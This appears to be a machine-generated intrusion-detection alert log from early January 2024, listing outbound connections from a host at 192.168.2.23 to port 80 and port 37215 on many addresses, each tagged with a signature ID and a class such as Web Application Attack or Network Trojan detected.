              Timestamp:192.168.2.2323.3.57.12446500802025883 01/02/24-06:25:22.066559
              SID:2025883
              Source Port:46500
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23154.216.168.7659634802030092 01/02/24-06:23:58.312912
              SID:2030092
              Source Port:59634
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2387.249.21.23144962802025883 01/02/24-06:23:59.225841
              SID:2025883
              Source Port:44962
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2352.216.42.2137628802030092 01/02/24-06:25:15.620032
              SID:2030092
              Source Port:37628
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23195.62.126.5460000802030092 01/02/24-06:24:11.155988
              SID:2030092
              Source Port:60000
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2391.146.142.15155428802030092 01/02/24-06:24:27.710944
              SID:2030092
              Source Port:55428
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2347.96.31.6043368802030092 01/02/24-06:24:32.931561
              SID:2030092
              Source Port:43368
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23123.1.253.23654834802030092 01/02/24-06:24:30.849841
              SID:2030092
              Source Port:54834
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2345.243.32.10952362802030092 01/02/24-06:25:05.266557
              SID:2030092
              Source Port:52362
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2324.236.125.8436362802025883 01/02/24-06:23:50.012962
              SID:2025883
              Source Port:36362
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.91.11.15157840802025883 01/02/24-06:23:57.977771
              SID:2025883
              Source Port:57840
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23157.90.166.540292802030092 01/02/24-06:25:26.148693
              SID:2030092
              Source Port:40292
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2374.48.170.2654894802025883 01/02/24-06:24:48.887995
              SID:2025883
              Source Port:54894
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23174.71.165.22954816802025883 01/02/24-06:24:51.730581
              SID:2025883
              Source Port:54816
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2334.88.138.1944478802030092 01/02/24-06:25:30.159443
              SID:2030092
              Source Port:44478
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23159.69.20.6060990802025883 01/02/24-06:23:51.599206
              SID:2025883
              Source Port:60990
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2391.242.215.20436660802030092 01/02/24-06:24:18.756077
              SID:2030092
              Source Port:36660
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2334.224.189.17652658802030092 01/02/24-06:25:00.915017
              SID:2030092
              Source Port:52658
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23116.202.207.17543532802025883 01/02/24-06:24:40.704654
              SID:2025883
              Source Port:43532
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2352.222.57.8340002802030092 01/02/24-06:24:17.613377
              SID:2030092
              Source Port:40002
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2335.242.176.1443110802030092 01/02/24-06:25:21.012628
              SID:2030092
              Source Port:43110
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23114.55.243.17648672802030092 01/02/24-06:25:22.179481
              SID:2030092
              Source Port:48672
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2351.210.249.6660948802030092 01/02/24-06:24:52.075605
              SID:2030092
              Source Port:60948
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.217.78.18433170802030092 01/02/24-06:25:04.964747
              SID:2030092
              Source Port:33170
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23197.26.86.8560062802030092 01/02/24-06:25:19.114868
              SID:2030092
              Source Port:60062
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23211.149.152.3757174802030092 01/02/24-06:25:42.230065
              SID:2030092
              Source Port:57174
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2345.15.66.2040310802030092 01/02/24-06:24:05.830727
              SID:2030092
              Source Port:40310
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2337.97.157.9157446802025883 01/02/24-06:25:34.999588
              SID:2025883
              Source Port:57446
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23211.251.235.10549264802030092 01/02/24-06:25:44.278757
              SID:2030092
              Source Port:49264
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23176.112.147.6145918802025883 01/02/24-06:24:56.122079
              SID:2025883
              Source Port:45918
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.73.17.2758458802025883 01/02/24-06:24:01.120240
              SID:2025883
              Source Port:58458
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2352.188.170.14760094802025883 01/02/24-06:24:56.015920
              SID:2025883
              Source Port:60094
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23143.0.84.21038402802030092 01/02/24-06:24:01.350138
              SID:2030092
              Source Port:38402
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2368.233.96.13258694802025883 01/02/24-06:25:19.392967
              SID:2025883
              Source Port:58694
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.21.5.8858690802030092 01/02/24-06:24:30.711855
              SID:2030092
              Source Port:58690
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.107.28.1660550802030092 01/02/24-06:23:51.391248
              SID:2030092
              Source Port:60550
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2318.67.255.7133036802025883 01/02/24-06:24:42.963614
              SID:2025883
              Source Port:33036
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23154.37.215.11352664802025883 01/02/24-06:25:06.760411
              SID:2025883
              Source Port:52664
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2318.140.253.6745590802030092 01/02/24-06:25:35.354970
              SID:2030092
              Source Port:45590
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.76.96.2160320802030092 01/02/24-06:25:15.761034
              SID:2030092
              Source Port:60320
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.232.136.180.9132958802030092 01/02/24-06:24:20.174770
              SID:2030092
              Source Port:32958
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.235.99.4053148372152835222 01/02/24-06:25:03.497246
              SID:2835222
              Source Port:53148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2388.151.101.14851274802030092 01/02/24-06:25:35.254797
              SID:2030092
              Source Port:51274
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2345.56.102.14636664802030092 01/02/24-06:24:56.015984
              SID:2030092
              Source Port:36664
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2362.202.156.24135188802025883 01/02/24-06:24:17.662475
              SID:2025883
              Source Port:35188
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.77.132.17740724802025883 01/02/24-06:24:18.209402
              SID:2025883
              Source Port:40724
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23202.88.191.10458160802030092 01/02/24-06:23:59.400873
              SID:2030092
              Source Port:58160
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23209.97.134.8644200802025883 01/02/24-06:24:43.211070
              SID:2025883
              Source Port:44200
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2367.160.112.10851240802030092 01/02/24-06:25:15.888424
              SID:2030092
              Source Port:51240
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2362.210.48.11336542802030092 01/02/24-06:25:31.316043
              SID:2030092
              Source Port:36542
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.25.137.9540366802030092 01/02/24-06:24:34.920245
              SID:2030092
              Source Port:40366
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.235.97.23040630372152835222 01/02/24-06:23:56.194246
              SID:2835222
              Source Port:40630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23185.79.154.21054452802030092 01/02/24-06:24:58.941620
              SID:2030092
              Source Port:54452
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23109.109.200.17557970802025883 01/02/24-06:24:01.322259
              SID:2025883
              Source Port:57970
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23175.126.123.11658590802030092 01/02/24-06:25:04.257669
              SID:2030092
              Source Port:58590
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.254.85.3256952372152829579 01/02/24-06:25:03.334382
              SID:2829579
              Source Port:56952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23107.149.236.15149944802030092 01/02/24-06:24:54.829093
              SID:2030092
              Source Port:49944
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23146.71.40.21548486802025883 01/02/24-06:24:05.866440
              SID:2025883
              Source Port:48486
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.205.246.4848598802030092 01/02/24-06:24:55.255106
              SID:2030092
              Source Port:48598
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.37.135.6550062802025883 01/02/24-06:24:03.045010
              SID:2025883
              Source Port:50062
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2337.32.125.6150126802025883 01/02/24-06:24:18.097501
              SID:2025883
              Source Port:50126
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23142.93.144.23436246802025883 01/02/24-06:24:36.837939
              SID:2025883
              Source Port:36246
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23172.121.20.14551014802030092 01/02/24-06:24:24.984846
              SID:2030092
              Source Port:51014
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23181.206.2.4650076802025883 01/02/24-06:24:03.265616
              SID:2025883
              Source Port:50076
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23185.2.14.1251600802025883 01/02/24-06:24:35.360260
              SID:2025883
              Source Port:51600
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23156.253.36.648376372152835222 01/02/24-06:24:16.442516
              SID:2835222
              Source Port:48376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2352.35.155.16647130802030092 01/02/24-06:25:42.678669
              SID:2030092
              Source Port:47130
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2352.85.133.3147266802025883 01/02/24-06:24:51.888604
              SID:2025883
              Source Port:47266
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.75.225.9144926802025883 01/02/24-06:24:58.708367
              SID:2025883
              Source Port:44926
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.231.150.12851852802025883 01/02/24-06:24:24.125011
              SID:2025883
              Source Port:51852
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23216.172.159.3643926802025883 01/02/24-06:25:37.943407
              SID:2025883
              Source Port:43926
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23156.247.27.1551010372152835222 01/02/24-06:24:09.783413
              SID:2835222
              Source Port:51010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23156.247.20.25537352372152835222 01/02/24-06:25:07.990796
              SID:2835222
              Source Port:37352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23106.14.41.17435930802030092 01/02/24-06:24:18.753229
              SID:2030092
              Source Port:35930
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.71.83.3248722802030092 01/02/24-06:25:16.196517
              SID:2030092
              Source Port:48722
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2318.223.213.8951292802025883 01/02/24-06:25:25.918831
              SID:2025883
              Source Port:51292
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23148.72.211.16752086802025883 01/02/24-06:24:45.420651
              SID:2025883
              Source Port:52086
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2334.216.109.859862802030092 01/02/24-06:24:27.341329
              SID:2030092
              Source Port:59862
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23119.23.86.14936618802030092 01/02/24-06:25:42.547024
              SID:2030092
              Source Port:36618
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23109.196.234.1858414802025883 01/02/24-06:23:55.633320
              SID:2025883
              Source Port:58414
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.79.255.2941640802025883 01/02/24-06:24:05.776321
              SID:2025883
              Source Port:41640
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2374.217.134.1157808802030092 01/02/24-06:25:44.030944
              SID:2030092
              Source Port:57808
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2345.32.70.4540790802030092 01/02/24-06:24:45.911026
              SID:2030092
              Source Port:40790
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.194.37.21755520802025883 01/02/24-06:23:55.440502
              SID:2025883
              Source Port:55520
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2313.244.84.14656714802025883 01/02/24-06:24:09.228401
              SID:2025883
              Source Port:56714
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23202.75.103.11733286802025883 01/02/24-06:24:31.278952
              SID:2025883
              Source Port:33286
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.100.160.20360636802030092 01/02/24-06:25:11.730540
              SID:2030092
              Source Port:60636
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2362.138.75.22955822802025883 01/02/24-06:25:35.265496
              SID:2025883
              Source Port:55822
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2345.91.92.17553294802030092 01/02/24-06:25:42.747930
              SID:2030092
              Source Port:53294
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.254.94.2659154372152829579 01/02/24-06:25:03.334223
              SID:2829579
              Source Port:59154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23156.235.102.17138108372152835222 01/02/24-06:24:02.515190
              SID:2835222
              Source Port:38108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23172.67.240.21640034802025883 01/02/24-06:25:29.545694
              SID:2025883
              Source Port:40034
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2382.165.119.13360268802025883 01/02/24-06:24:19.252681
              SID:2025883
              Source Port:60268
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2381.45.23.21550156802030092 01/02/24-06:25:39.133513
              SID:2030092
              Source Port:50156
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.77.130.17758998372152829579 01/02/24-06:24:06.202488
              SID:2829579
              Source Port:58998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2354.219.136.3735172802025883 01/02/24-06:25:18.698984
              SID:2025883
              Source Port:35172
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23164.132.227.17152970802030092 01/02/24-06:25:19.078205
              SID:2030092
              Source Port:52970
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23103.131.18.24355884802030092 01/02/24-06:25:21.511351
              SID:2030092
              Source Port:55884
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23101.42.123.6038286802030092 01/02/24-06:23:49.854020
              SID:2030092
              Source Port:38286
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.254.98.9037532372152829579 01/02/24-06:23:56.031360
              SID:2829579
              Source Port:37532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2341.111.241.3452770802030092 01/02/24-06:25:30.188511
              SID:2030092
              Source Port:52770
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23113.198.35.22256150802030092 01/02/24-06:23:49.840400
              SID:2030092
              Source Port:56150
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23173.224.201.17554220802025883 01/02/24-06:24:23.810709
              SID:2025883
              Source Port:54220
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.105.18.18246624802025883 01/02/24-06:24:13.802828
              SID:2025883
              Source Port:46624
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2352.208.51.24237438802030092 01/02/24-06:24:46.160935
              SID:2030092
              Source Port:37438
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.24.209.20437990802025883 01/02/24-06:25:29.545650
              SID:2025883
              Source Port:37990
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23204.152.46.6744196802030092 01/02/24-06:24:40.815829
              SID:2030092
              Source Port:44196
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2338.6.180.18441692802030092 01/02/24-06:25:01.064194
              SID:2030092
              Source Port:41692
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2394.253.89.2442508802025883 01/02/24-06:23:50.267161
              SID:2025883
              Source Port:42508
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23156.253.47.15437722372152829579 01/02/24-06:24:59.013684
              SID:2829579
              Source Port:37722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2318.65.143.9547196802030092 01/02/24-06:25:12.172054
              SID:2030092
              Source Port:47196
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.235.102.23453884372152835222 01/02/24-06:24:34.990700
              SID:2835222
              Source Port:53884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23198.154.232.24259276802025883 01/02/24-06:24:45.021090
              SID:2025883
              Source Port:59276
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2387.255.233.5348182802025883 01/02/24-06:24:08.655481
              SID:2025883
              Source Port:48182
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.125.2.9460962802030092 01/02/24-06:24:40.594854
              SID:2030092
              Source Port:60962
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23154.92.226.19933136802030092 01/02/24-06:24:13.806614
              SID:2030092
              Source Port:33136
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23199.232.239.4846658802030092 01/02/24-06:24:23.868552
              SID:2030092
              Source Port:46658
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23114.33.8.1834070802030092 01/02/24-06:25:18.822764
              SID:2030092
              Source Port:34070
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23154.221.82.22160596802025883 01/02/24-06:25:02.335948
              SID:2025883
              Source Port:60596
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23185.110.26.8256372802025883 01/02/24-06:24:19.276074
              SID:2025883
              Source Port:56372
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23103.50.160.13953436802030092 01/02/24-06:24:30.812927
              SID:2030092
              Source Port:53436
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2351.68.46.2342144802025883 01/02/24-06:24:54.912247
              SID:2025883
              Source Port:42144
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23185.164.6.4838734802025883 01/02/24-06:23:54.914292
              SID:2025883
              Source Port:38734
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23202.43.100.11357888802030092 01/02/24-06:24:43.056570
              SID:2030092
              Source Port:57888
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23173.242.127.8135322802030092 01/02/24-06:25:25.176699
              SID:2030092
              Source Port:35322
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2350.19.25.18857882802025883 01/02/24-06:24:17.916928
              SID:2025883
              Source Port:57882
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23186.132.17.22347340802025883 01/02/24-06:24:18.726816
              SID:2025883
              Source Port:47340
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23156.235.102.7249608372152835222 01/02/24-06:25:03.497048
              SID:2835222
              Source Port:49608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2352.218.179.4559110802025883 01/02/24-06:25:34.705547
              SID:2025883
              Source Port:59110
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23191.82.53.4348036802025883 01/02/24-06:24:27.438039
              SID:2025883
              Source Port:48036
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23220.134.218.24855228802025883 01/02/24-06:23:51.508732
              SID:2025883
              Source Port:55228
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2352.50.137.22941178802030092 01/02/24-06:24:03.282074
              SID:2030092
              Source Port:41178
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2346.101.108.16542208802025883 01/02/24-06:24:24.183226
              SID:2025883
              Source Port:42208
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.55.68.9857508802025883 01/02/24-06:25:29.993837
              SID:2025883
              Source Port:57508
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2389.31.76.4547048802025883 01/02/24-06:24:08.904729
              SID:2025883
              Source Port:47048
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2334.196.134.24735922802025883 01/02/24-06:25:34.999781
              SID:2025883
              Source Port:35922
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23125.229.151.23948022802030092 01/02/24-06:23:54.655329
              SID:2030092
              Source Port:48022
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23121.11.37.23456708802030092 01/02/24-06:24:50.567237
              SID:2030092
              Source Port:56708
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23117.20.101.12541464802030092 01/02/24-06:24:32.881657
              SID:2030092
              Source Port:41464
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23146.75.63.13352912802030092 01/02/24-06:23:55.171237
              SID:2030092
              Source Port:52912
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23108.186.112.3448840802030092 01/02/24-06:24:54.992165
              SID:2030092
              Source Port:48840
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23121.143.178.8245268802030092 01/02/24-06:25:22.174762
              SID:2030092
              Source Port:45268
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2335.187.108.16953570802030092 01/02/24-06:25:21.019391
              SID:2030092
              Source Port:53570
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23190.167.115.16244810802025883 01/02/24-06:23:55.091590
              SID:2025883
              Source Port:44810
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2318.67.147.1742596802025883 01/02/24-06:25:34.896348
              SID:2025883
              Source Port:42596
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2331.30.58.13333052802025883 01/02/24-06:24:10.909503
              SID:2025883
              Source Port:33052
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.230.152.22549862802025883 01/02/24-06:24:23.652013
              SID:2025883
              Source Port:49862
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2354.179.83.5233844802025883 01/02/24-06:25:04.468216
              SID:2025883
              Source Port:33844
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2384.247.28.15551342802030092 01/02/24-06:24:08.653606
              SID:2030092
              Source Port:51342
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23213.29.227.25034468802030092 01/02/24-06:24:19.265733
              SID:2030092
              Source Port:34468
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2351.138.221.22455554802025883 01/02/24-06:25:00.997015
              SID:2025883
              Source Port:55554
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23154.219.183.10247752802030092 01/02/24-06:25:34.822358
              SID:2030092
              Source Port:47752
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23220.137.212.6059920802030092 01/02/24-06:25:15.748234
              SID:2030092
              Source Port:59920
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2352.24.96.4456028802025883 01/02/24-06:25:04.184391
              SID:2025883
              Source Port:56028
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2398.123.179.9836228802030092 01/02/24-06:24:08.556843
              SID:2030092
              Source Port:36228
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23154.218.175.19054758802025883 01/02/24-06:25:06.948021
              SID:2025883
              Source Port:54758
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.14.39.9148702802025883 01/02/24-06:25:37.988872
              SID:2025883
